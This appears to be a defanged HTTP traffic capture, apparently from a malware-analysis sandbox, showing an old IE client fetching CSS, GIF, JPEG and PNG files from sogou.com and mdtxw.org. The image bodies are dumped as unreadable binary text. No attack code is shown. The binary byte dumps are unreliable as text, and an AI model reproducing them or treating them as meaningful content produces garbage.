Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Length: 3717

Content-Type: text/css

Last-Modified: Thu, 10 Apr 2014 16:40:38 GMT

Accept-Ranges: bytes

ETag: "0c7479adb54cf1:420"

Server: Microsoft-IIS/6.0

Who: ShanIE

Date: Sun, 01 Jun 2014 03:33:55 GMT
*{margin:0px;padding:0px;}..html,body {overflow: hidden;}..body {font:
 12px/18px Simsun, Helvetica, Arial, sans-serif; text-align: center; f
ont-size-adjust: none; font-stretch: normal;}..ul ,li{list-style: none
;}..a {color: rgb(51, 51, 51); text-decoration: none;}..a:hover {color
: rgb(189, 10, 1); text-decoration: underline;}..a,img{border:0px;}...
focus_filter {left: 0px; width: 100%; text-align: center; bottom: 0px;
 display: block; position: absolute; z-index: 3; cursor: pointer;}...f
ocus_filter {background: rgb(0, 0, 0); height: 21px; z-index: 1; opaci
ty: 0.6; -moz-opacity: 0.6;}...main {background: rgb(255, 255, 255); p
adding: 14px 0px 0px 14px; width: 509px; height: 352px; text-align: le
ft; float: left; position: relative; -ms-zoom: 1;}...main_left {backgr
ound: rgb(255, 255, 255); width: 222px; overflow: hidden; padding-righ
t: 20px; float: left;}...product_yl .list_news_yl1 {padding: 4px 0px; 
margin-bottom: 3px; border-bottom-color: rgb(139, 140, 140); border-bo
ttom-width: 1px; border-bottom-style: dotted;}...mod_left {margin-top:
 10px;}...list_pic {width: 222px; overflow: hidden; -ms-zoom: 1;}...li
st_pic ul {width: 232px;}...list_pic li {margin-right: 10px; float: le
ft;}...list_pic li a {padding: 2px; border: 1px solid rgb(221, 223, 22
2); width: 100px; float: left;}...list_pic li a img {width: 100px; hei
ght: 65px;}...list_pic li a span {height: 19px; text-align: center; pa
dding-top: 6px; display: block; cursor: pointer;}...list_pic li a:hove
r {text-decoration: none;}...list_pic li a:hover img {text-decorat<<< skipped >>>

GET /images/weather/cloudy.gif HTTP/1.1

Accept: */*

Referer: hXXp://123.sogou.com/?22014

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; TheWorld)

Host: 123.sogou.com

Connection: Keep-Alive

Cookie: ipt=0; SDUV=1401576016258_7438_00001; CKOR=7763_00001_00000; CKOD=1371_00000_00000; IPLOC=CA; GOTO=Af22014; SUV=008D2FB7B86B2626538A9F06D057B568


HTTP/1.1 200 OK

Server: nginx

Date: Sun, 01 Jun 2014 03:33:26 GMT

Content-Type: image/gif

Content-Length: 1663

Connection: keep-alive

Last-Modified: Sun, 09 Oct 2011 10:21:03 GMT

ETag: "4e91758f-67f"

Expires: Sat, 14 Jun 2014 02:53:46 GMT

Cache-Control: max-age=2592000

Accept-Ranges: bytes

GIF89a(.(.............................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
..............................y.......................................
......................................................................
......................................................................
......................................................................
...........!.......,....(.(........H......*\......#J.H1..t..bCa..(Q..e
L(..7........H..x]..H..ff\[email protected]..
...ajT.Q..H.#F......Xa.....04. eS...z.*E....E.......?Ql...'.&*.k402...
6l.D...L#(v<.2....g..)Q....W#0..!.G//q.....N.0.....Q........... 2x.
..........y....Z...Yx...#Sh..$....~..8.a..KY...*[email protected]......
..q..r.".X.B.^..I.1...;.es...$....x"..q$QA.)\....X`..P.......J8.....aq
p...L..!..`.1..r.......".....h.N7.}..$...C.Q......P.(<....?....t...
..!.N45.B.*[email protected]...<!$.20P`..Pd.. Y....)..B..
......H............"..#..........D.Z,...E.RD 3... \,..;.T..2V`.H.. .D"
L......A.!R.!B.....C]$..0[...4R.2..D..A!j...0?DAG..84.&.T1..R....6H!..
eD.B..t.......-s81.......?.R./..1F...D..v....O..H#..-uB..3.=Xc....

<<< skipped >>>

GET /miniindex/images/b16.jpg HTTP/1.1

Accept: */*

Referer: hXXp://VVV.mdtxw.org/miniindex/xinwen.htm?time=undefined

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.mdtxw.org

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Length: 43598

Content-Type: image/jpeg

Last-Modified: Mon, 14 Apr 2014 08:01:35 GMT

Accept-Ranges: bytes

ETag: "801942c1b757cf1:420"

Server: Microsoft-IIS/6.0

Who: ShanIE

Date: Sun, 01 Jun 2014 03:33:56 GMT
......JFIF.....H.H......Exif..MM.*.............................b......
.....j.(...........1.........r.2...........i.................H.......H
....Adobe Photoshop CS Windows.2014:04:14 16:01:34....................
.................................................................&.(..
.......................................H.......H..........JFIF.....H.H
......Adobe_CM......Adobe.d...........................................
......................................................................
................................f...."................?...............
...........................................................3......!.1.
AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE..t6..U.e.....u..F'.....
..........Vfv........7GWgw........................5.....!1..AQaq"..2..
...B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te......u..F...............
Vfv........'7GWgw.................?..{..h....iku..C.v..8D.. 1...5'r.5.
.}....)T.....sv...'E'....'D.T....?w..j.....8l....]...c...G........C.Ce
.DhH.0....L.N.......;..H........F..s..v...A...._...ICu.v.vC.F0>.;..
.......;.c6.....t~.^NCr^.|:X.k.....&.R..k=/O....'. .~...|..l..9..-.#A.
.O...5ut............c.` ...c.^..&(e=H.."46G...]g.=.8Y./...V..z.6~.. ..
1.G._N.z....U..U.`...O.f.o{e..[K..............]n}..u..^..m..-l.5..t?..
.k.. w....."..-.....:.....^........t...........Sv......5._c.!.....s. .
Kk.m..kO..v.{N.b...}......A.......I..1.h..!...&O.W..._........C..T....
.....gJ..X.."!:........{........?.]..;.V.'B..T9.X.{....".[..."..3}.]. 
Y.....g.*9..G<}....P.uE.7*.....q.....?h.......O'.[t<.....V..<<< skipped >>>

GET /miniindex/images/aaa3.jpg HTTP/1.1

Accept: */*

Referer: hXXp://VVV.mdtxw.org/miniindex/meinv.htm?time=undefined

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.mdtxw.org

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Length: 67971

Content-Type: image/jpeg

Last-Modified: Mon, 14 Apr 2014 09:29:12 GMT

Accept-Ranges: bytes

ETag: "0a4acfec357cf1:420"

Server: Microsoft-IIS/6.0

Who: ShanIE

Date: Sun, 01 Jun 2014 03:33:58 GMT
......JFIF.....`.`.....fExif..MM.*.............................b......
.....j.(...........1.........r.2...........i.................`.......`
....Adobe Photoshop CS Windows.2014:04:14 17:01:17....................
.................................................................&.(..
...............................0.......H.......H..........JFIF.....H.H
......Adobe_CM......Adobe.d...........................................
......................................................................
................................x...."................?...............
...........................................................3......!.1.
AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE..t6..U.e.....u..F'.....
..........Vfv........7GWgw........................5.....!1..AQaq"..2..
...B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te......u..F...............
Vfv........'7GWgw.................?..EU....G.S.........H)..3.....?{..$
..k..7}.?..t ...N&`|..~......d.&.............. y...q.........?...K..l.
....R......?...v..I.g.Dy6...w.n......m..R...?.j.....lI i...G.o.>...
}......E.nuB.5$3.......}...e.c.E8-6.[.v...k_f......k)o......]......6..
.1..s......_.. .....].....7..g....z...w.k...j.~..........]..[.P#k.}nic
.?....\....Z...9.]=.O.f......Pyy..L......u....v.z...G..........u.....n
....n......"[email protected]\OG*...s..*...e..kl;^.....W...W...Y..o.....7....s}.
Xw4.i......c..5...g....N'VcH...A.g....%..Dw.....fQw...9pV...w8.6....{.
....]...q=7)...e........z.#.^.e.;..~;...JYW...U...Z.:*W......U?s_.....
.....B...H*L.A... .N.(...3..Q.._.U..A..:....?.........~.._.>z.Y<<< skipped >>>

GET /miniindex/images/aaa5.jpg HTTP/1.1

Accept: */*

Referer: hXXp://VVV.mdtxw.org/miniindex/meinv.htm?time=undefined

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.mdtxw.org

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Length: 71321

Content-Type: image/jpeg

Last-Modified: Mon, 14 Apr 2014 09:29:12 GMT

Accept-Ranges: bytes

ETag: "0a4acfec357cf1:420"

Server: Microsoft-IIS/6.0

Who: ShanIE

Date: Sun, 01 Jun 2014 03:33:59 GMT
......JFIF.....`.`......Exif..MM.*.............................b......
.....j.(...........1.........r.2...........i.................`.......`
....Adobe Photoshop CS Windows.2014:04:14 17:10:25....................
.................................................................&.(..
.......................................H.......H..........JFIF.....H.H
......Adobe_CM......Adobe.d...........................................
......................................................................
................................x...."................?...............
...........................................................3......!.1.
AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE..t6..U.e.....u..F'.....
..........Vfv........7GWgw........................5.....!1..AQaq"..2..
...B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te......u..F...............
Vfv........'[email protected][email protected]..../..d.
v.;...q.h.#!.m.....;......Y..... Z~..7z?O....wu7.....S..Y.m.d{.=../...
m..........o..{......m.f....-yu.|.$..s......?.P...~.}_...znP}.....k..I
>..........k.....Ll..o.#..UuD:.Xv......~.}l.... ."..q......O.Y,h.,.
k............u.6..{@..#...l?..~.e..-~K=#.M...[.......H....^...?.......
f.[_H%. <....l....p..r..6m/{a.N. .5.8......9.u...@....'.;..Wg..]lT.
............9...o.uW.Q..a.... ........YV3.<..n.ZD~...Z.....)..iu.s.
..O...}..&...O%..:.6.q..WI.o...Uf...:X..'rfB"......Y..I..v.......k7.5.
.....:L..&>j.X.SN=T.U]O%..F.d.....MN....j......?9.*...y.1..b<..g
:.dd.............T`<.,.ku....r...Z0.,8....,{.u.2.\...OQq..[....<<< skipped >>>

GET /miniindex/images/aaa6.jpg HTTP/1.1

Accept: */*

Referer: hXXp://VVV.mdtxw.org/miniindex/meinv.htm?time=undefined

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.mdtxw.org

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Length: 40601

Content-Type: image/jpeg

Last-Modified: Mon, 14 Apr 2014 09:29:12 GMT

Accept-Ranges: bytes

ETag: "0a4acfec357cf1:420"

Server: Microsoft-IIS/6.0

Who: ShanIE

Date: Sun, 01 Jun 2014 03:34:01 GMT
......JFIF.....`.`.....cExif..MM.*.............................b......
.....j.(...........1.........r.2...........i.................`.......`
....Adobe Photoshop CS Windows.2014:04:14 17:17:06....................
.................................................................&.(..
...............................-.......H.......H..........JFIF.....H.H
......Adobe_CM......Adobe.d...........................................
......................................................................
................................x...."................?...............
...........................................................3......!.1.
AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE..t6..U.e.....u..F'.....
..........Vfv........7GWgw........................5.....!1..AQaq"..2..
...B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te......u..F...............
Vfv........'7GWgw.................?....`..r.Z..l.t...q-..deLOaN;..._.=
t.1.K.7...... ..m.1.;..gs....rf.....a.c.44....mZ.u.4...c..v9...utx?\l.
......@l$7i?E.5...?........d.........E"...k*......c..........s.^.]W..u
,'.\.>.#..E.:..N.f.../M{...2|.k.h.@>..-f..g}..[.u...a..9..4.....
.......-q.)%..'$..>.......... :.E......S...K.....qr,....`x'e. .?5..
.#....hz^..`.cN.. .|.#.....2>z%ji.J.s}..4.c.....a...C..u...\.mS....
.`....A3......l(4C..Uo.x.n.... .U@...{{......vRw........i..M{...8.u..:
.......!q...@t[.KG.{....1>........-k...*C....$.R;...Z...,< u;}6.
5'.......6.....x...)...l-s}..H.)......bh.h.k/....o5.u,WWy.y....w5.~...
^..wz~.}.W....o....t%@Z.'@....S=@.#..n...Sa.H.{J...V..Wcn{F&.....^<<< skipped >>>

GET /miniindex/images/aaa1.jpg HTTP/1.1

Accept: */*

Referer: hXXp://VVV.mdtxw.org/miniindex/meinv.htm?time=undefined

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.mdtxw.org

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Length: 45855

Content-Type: image/jpeg

Last-Modified: Mon, 14 Apr 2014 09:29:12 GMT

Accept-Ranges: bytes

ETag: "0a4acfec357cf1:420"

Server: Microsoft-IIS/6.0

Who: ShanIE

Date: Sun, 01 Jun 2014 03:34:01 GMT
......JFIF.....`.`......Exif..MM.*.............................b......
.....j.(...........1.........r.2...........i.................`.......`
....Adobe Photoshop CS Windows.2014:04:14 16:43:10....................
.....................^...........................................&.(..
...............................w.......H.......H..........JFIF.....H.H
......Adobe_CM......Adobe.d...........................................
......................................................................
................................A...."................?...............
...........................................................3......!.1.
AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE..t6..U.e.....u..F'.....
..........Vfv........7GWgw........................5.....!1..AQaq"..2..
...B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te......u..F...............
Vfv........'7GWgw.................?..~..e........l%.....Y{.m.9..V.[..^
...3..4N..X.........m.. .U.?....u.Q.y....!.9....NN.S\....*......Z?...d
`uW.9.....1{..Xo..G....V.~{.W....S. .09*P.~..}_V.......qlr......K.zKP.
}g.y....nE..5.8TN!{....K\.O.w...UuZ....[U....t.....6<u.....[..[_S..
..I...g........^.h.^?..*Et.["..\CZ.K.x...s.........y..QwM.>..w.....
.Z..EWdc.Z.,.........k}e...Z..3G7....I....y]?Xp......N8~]..m.4}..#!...
.W................w.K\..B4#.....{(cf.g...k.}o.....<....o...>.#1.
^.D....y__...u..7]g...[..>.]......Y.w..WW.Z..-q.B4\?B.......2.FV].s
l..z..W4[.{.s....A....I.\.j...UR].1..8.;..nw... .bH.<Z]o..tN.......
UU.7.c.eU....Z......tN...]E.....H....-...u.......*.72..MM..Y.r..v.<<< skipped >>>

GET /miniindex/images/aaa2.jpg HTTP/1.1

Accept: */*

Referer: hXXp://VVV.mdtxw.org/miniindex/meinv.htm?time=undefined

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.mdtxw.org

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Length: 40325

Content-Type: image/jpeg

Last-Modified: Mon, 14 Apr 2014 09:29:12 GMT

Accept-Ranges: bytes

ETag: "0a4acfec357cf1:420"

Server: Microsoft-IIS/6.0

Who: ShanIE

Date: Sun, 01 Jun 2014 03:34:01 GMT
......JFIF.....`.`......Exif..MM.*.............................b......
.....j.(...........1.........r.2...........i.................`.......`
....Adobe Photoshop CS Windows.2014:04:14 16:57:14....................
.....................k...........................................&.(..
.......................................H.......H..........JFIF.....H.H
......Adobe_CM......Adobe.d...........................................
......................................................................
................................J...."................?...............
...........................................................3......!.1.
AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE..t6..U.e.....u..F'.....
..........Vfv........7GWgw........................5.....!1..AQaq"..2..
...B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te......u..F...............
Vfv........'7GWgw.................?...`..?..............0h....t....X..
[email protected]'[email protected]=.{..>.K.<.w........F
.}...S..$F..........#&.!_.{r.q.....;...&.~......T.3/9..M..H<WX..v..
.....J...}..v.. ..0.a...z..S_.....%.s.X88.?.8........R..o.V.RR].....m.
..K|..-.K?Us...............P......t..3............N.8......2~h.X55....
.....}.....]K..Z.....9.....w.E......SN........r.}...t ......Q .w......
......o`...#?..........}C...7zn.8...g...r........7.w...c...''b./6,.P.`
.... I...........;[.;........0.S..Q.Z...b....O<)..I.).(....@5.$.Z.I
..s...z.s.m..l.......&.......5`..l.........>..J...!..b.{.{..Z.Y.R..
7d...G..._R(...=Q...'.o.l....U.z.Q."..m88..X...qi;....S..E.. )...(<<< skipped >>>

GET /miniindex/images/aaa8.jpg HTTP/1.1

Accept: */*

Referer: hXXp://VVV.mdtxw.org/miniindex/meinv.htm?time=undefined

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.mdtxw.org

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Length: 22801

Content-Type: image/jpeg

Last-Modified: Mon, 14 Apr 2014 09:29:12 GMT

Accept-Ranges: bytes

ETag: "0a4acfec357cf1:420"

Server: Microsoft-IIS/6.0

Who: ShanIE

Date: Sun, 01 Jun 2014 03:34:02 GMT
......JFIF.....`.`......Exif..MM.*.............................b......
.....j.(...........1.........r.2...........i.................`.......`
....Adobe Photoshop CS Windows.2014:04:14 17:23:40....................
.........}...........~...........................................&.(..
.......................................H.......H..........JFIF.....H.H
......Adobe_CM......Adobe.d...........................................
......................................................................
................................~.}.."................?...............
...........................................................3......!.1.
AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE..t6..U.e.....u..F'.....
..........Vfv........7GWgw........................5.....!1..AQaq"..2..
...B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te......u..F...............
Vfv........'7GWgw.................?....8.|.d[..[....."S...`..2H0EgQ...
]V.w.E.........,.!!.....K.W...]..._..m.#L...%..Sr...X^Y.io?.... .c....
.h.P...hx:....{>.=.3k...;.......6.m{=.{H.......l.J#QOU.....k..M_...
....V...t..`e...n....... .6...i.. ...V....'9'9........Cs.9.e.)w9Cv..r.
......&@......*..*.,.d..U.-qo..Lgb.sKO..}..x......r..W%. ..m....)..k~M
-...=....az=....d....c..K....3.$.7.A.?..;.f~....a.hm..n...^h.Ttnr.$.s.
.=......f...J....?..F."......q...p..8..q..{~..r?X.C.....~....(i._...w.
h...V.C.'h...?.w..c9...z......^sz.NNSi.t......).....B.n......>../..
Uuy.5....KgY....p. .5..?...s.[6"..I........C~.<....:..s.e:...#.c.%.
W..c.#.).P.|Rs.%=....M..'B.y....fz.eZm....S..r.J...~....O.l.~..S..<<< skipped >>>

GET /miniindex/images/aaa10.jpg HTTP/1.1

Accept: */*

Referer: hXXp://VVV.mdtxw.org/miniindex/meinv.htm?time=undefined

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.mdtxw.org

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Length: 23965

Content-Type: image/jpeg

Last-Modified: Mon, 14 Apr 2014 09:29:12 GMT

Accept-Ranges: bytes

ETag: "0a4acfec357cf1:420"

Server: Microsoft-IIS/6.0

Who: ShanIE

Date: Sun, 01 Jun 2014 03:34:02 GMT
......JFIF.....`.`......Exif..MM.*.............................b......
.....j.(...........1.........r.2...........i.................`.......`
....Adobe Photoshop CS Windows.2014:04:14 17:28:23....................
.........}...........~...........................................&.(..
...............................Z.......H.......H..........JFIF.....H.H
......Adobe_CM......Adobe.d...........................................
......................................................................
................................~.}.."................?...............
...........................................................3......!.1.
AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE..t6..U.e.....u..F'.....
..........Vfv........7GWgw........................5.....!1..AQaq"..2..
...B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te......u..F...............
Vfv........'7GWgw.................?..Y. Cn..gE.Y.K.\i..6.[[..........4
.E/?.x.-|[email protected]..(...{....;}....}N.9....`. R5...-...eD{~%Qn#...zGU.&g
t;...l..5h.p...8.".. F......j.>...]`..vCvC..H........T.:1S3xp......
88...(...]..E).a .9B.......%:r.f.............;][email protected]
he..;g.T=J6.=_.z...`.=..N.,l..R.S..L.<O.n...../...p.F..QH.  r.1..]W
[email protected]>......
Vw....{.....9...;ts7.Ut....O.`S.qD~ .8I.Z.D.......?*.~.tS.]v63........
gf...ee.:..&7Y.W._.[]l...!.p..X.W..r#....W...f.... .....z^e..me...H...
b...,.7p.4.)..q..!.q%.9WEpF..c...M{m..........{.[p.5!.. [email protected]
..>....B7...P....1....q...<d.....|..i........89.....U..5ul.7<<< skipped >>>

GET /imgn/v32/selogo_111207.png HTTP/1.1

Accept: */*

Referer: hXXp://123.sogou.com/?22014

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; TheWorld)

Host: p4.123.sogoucdn.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx/1.4.1

Date: Sun, 01 Jun 2014 03:33:25 GMT

Content-Type: image/png

Content-Length: 12155

Last-Modified: Wed, 20 Jun 2012 04:23:24 GMT

Connection: keep-alive

Expires: Tue, 01 Jul 2014 03:33:25 GMT

Cache-Control: max-age=2592000

Accept-Ranges: bytes
.PNG........IHDR...a...?.....V.......pHYs................OiCCPPhotosho
p ICC profile..x..SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE.........
..Q,......!.........{.k........>...........H3Q5...B..........@..$p.
...d!s.#...~<< ".....x.....M..0.....B.\[email protected]..@F....
&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH..
...........0Q..)..{.`.##x.....F.W<. ...*..x..<.$9E.[.-q.WW..(.I.
 [email protected]..._-...."[email protected]~..,/...;.
.m..%..h^[email protected].~<<E.........J.B[a.W}.g._.W.l.~<..
....$.2].G......L......b...G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..&
gt;.5..j>.{.-.]c..K'.Xt.......o..(...h...w..?.G.%..fI.q..^D$.T..?..
..D..*.A....,.........`6.B$..B.B.d..r`)..B(....*`/[email protected]..=p..
a...(....A...a!...b.X#......!.H...$ ...Q"K.5H1R.T UH..=r.9.\F..;..2...
.G1...Q=...C..7..F...dt1......r..=.6....h...>C.0....3.l0...B.8,..c.
."......V.....c..w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.X
H,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,  .......3...!.[.
[email protected].(R.jJ....4..e.2AU..R...T.5.ZB...R.Q...4u.9...IK......h.h.i..t.
....N..W...G.....w.......g(.....g.w...L......T071......oUX*.*|.....J.&
..*/T.......U.U.T..^S}.FU3S......U..P.S.Sg.;...g.oT?.~Y...Y.L.OC.Q.._.
.. .c..x,!k...u.5.&...|v*......=...9C3J3W.R..f?...q..tN..(...~....).).
.4L.1e\k....X.H.Q.G..6......E.Y...A.J'\'Gg.....S.S.....M=:....k....Dw.
n.....^..Lo..y....}/.T.m...G.X...$.....<.5qo<./...QC][email protected]....
..<..F.F..i.\.$.m.m..&.&!&KM.M..RM..).;L;L........5.=1.2.......<<< skipped >>>

GET /imgn/v32/skin3.gif HTTP/1.1

Accept: */*

Referer: hXXp://123.sogou.com/?22014

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; TheWorld)

Host: p0.123.sogoucdn.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx/1.4.1

Date: Sun, 01 Jun 2014 03:33:25 GMT

Content-Type: image/gif

Content-Length: 4159

Last-Modified: Wed, 20 Jun 2012 04:23:24 GMT

Connection: keep-alive

Expires: Tue, 01 Jul 2014 03:33:25 GMT

Cache-Control: max-age=2592000

Accept-Ranges: bytes
GIF89a..h..........R..J..Bs.S................r.....qq}a...............
........n..~..|..m..l..l..x..k..v..t..i..s.xa..n..l..k.ua..i..h..i.~f.
r`....wd.xd....rb....pa.nb.rf.vm.xp.xp}OJ..........l`.mb.pe.od.oe.wl.x
n.qg.~t.sj.sj.tk..|..}....SM.vn............wMIuLH.|v.}wmJG.......~yeHE
..|..................................................................H
??....................................................................
......................................................................
......................................................................
.................|||{{{zzzyyyxxxtttsssrrrpppmmmlllkkkjjj<<<..
......................................................................
......................................................................
....................!.......,......h........H......*\.......H.H.....3j
.....I.BJ......(S.\.....0].IdI.$K...T...O.....JTh.dH.*EZ..O....%j....J
.@1.....{[email protected].=;..].VA.8p..ms....x.5m../..;8.......u.........#[...N!
F.......g....&L.`2....T.....;vd.L8L./..g.......)..s.....]..=P......F}W
.@..)....v\4=bs..}w...J|._.>.r...?..].t.......B..)T.].n....g....B.&
....'!d....2.=W.2.Q..2.Y`...x....\(..I.....1.....`...L...s|...@R......
.|p...].2.Bl L...#8...l<.[.e..C.o.W..6.&..2.....E....U....).ZS!....
".p....%F.;[email protected]...^..........H..D....C.....B
u.bj ......b..d.......l.k...0F......8|Z...R.k.........A.sf...u6...wN[m
.;9..TS.u.VJ5..O..k.i.......$...............p..G,....j...g....w... ..q
...l..(..r.$_.qM .4.'1..J.6..r.pb<J*..<.-.............I.<<<< skipped >>>

GET /imgn/v32/titlebg.png HTTP/1.1

Accept: */*

Referer: hXXp://123.sogou.com/?22014

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; TheWorld)

Host: p0.123.sogoucdn.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx/1.4.1

Date: Sun, 01 Jun 2014 03:33:26 GMT

Content-Type: image/png

Content-Length: 2842

Last-Modified: Wed, 20 Jun 2012 04:23:24 GMT

Connection: keep-alive

Expires: Tue, 01 Jul 2014 03:33:26 GMT

Cache-Control: max-age=2592000

Accept-Ranges: bytes
.PNG........IHDR.............b.......pHYs................OiCCPPhotosho
p ICC profile..x..SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE.........
..Q,......!.........{.k........>...........H3Q5...B..........@..$p.
...d!s.#...~<< ".....x.....M..0.....B.\[email protected]..@F....
&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH..
...........0Q..)..{.`.##x.....F.W<. ...*..x..<.$9E.[.-q.WW..(.I.
 [email protected]..._-...."[email protected]~..,/...;.
.m..%..h^[email protected].~<<E.........J.B[a.W}.g._.W.l.~<..
....$.2].G......L......b...G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..&
gt;.5..j>.{.-.]c..K'.Xt.......o..(...h...w..?.G.%..fI.q..^D$.T..?..
..D..*.A....,.........`6.B$..B.B.d..r`)..B(....*`/[email protected]..=p..
a...(....A...a!...b.X#......!.H...$ ...Q"K.5H1R.T UH..=r.9.\F..;..2...
.G1...Q=...C..7..F...dt1......r..=.6....h...>C.0....3.l0...B.8,..c.
."......V.....c..w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.X
H,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,  .......3...!.[.
[email protected].(R.jJ....4..e.2AU..R...T.5.ZB...R.Q...4u.9...IK......h.h.i..t.
....N..W...G.....w.......g(.....g.w...L......T071......oUX*.*|.....J.&
..*/T.......U.U.T..^S}.FU3S......U..P.S.Sg.;...g.oT?.~Y...Y.L.OC.Q.._.
.. .c..x,!k...u.5.&...|v*......=...9C3J3W.R..f?...q..tN..(...~....).).
.4L.1e\k....X.H.Q.G..6......E.Y...A.J'\'Gg.....S.S.....M=:....k....Dw.
n.....^..Lo..y....}/.T.m...G.X...$.....<.5qo<./...QC][email protected]....
..<..F.F..i.\.$.m.m..&.&!&KM.M..RM..).;L;L........5.=1.2.......<<< skipped >>>

GET /imgu/2014/05/20140526170756_638.jpg HTTP/1.1

Accept: */*

Referer: hXXp://123.sogou.com/?22014

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; TheWorld)

Host: p0.123.sogoucdn.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx/1.4.1

Date: Sun, 01 Jun 2014 03:33:32 GMT

Content-Type: image/jpeg

Content-Length: 5409

Last-Modified: Mon, 26 May 2014 09:07:56 GMT

Connection: keep-alive

Expires: Tue, 01 Jul 2014 03:33:32 GMT

Cache-Control: max-age=2592000

Accept-Ranges: bytes
......JFIF.............0Exif..II*.......1...............VVV.meitu.com.
...C..................................................................
..C...................................................................
....=._...............................................................
}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUV
WXYZcdefghijstuvwxyz..................................................
......................................................................
......w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFG
HIJSTUVWXYZcdefghijstuvwxyz...........................................
.........................................?....x@..........'_.H. .#S...
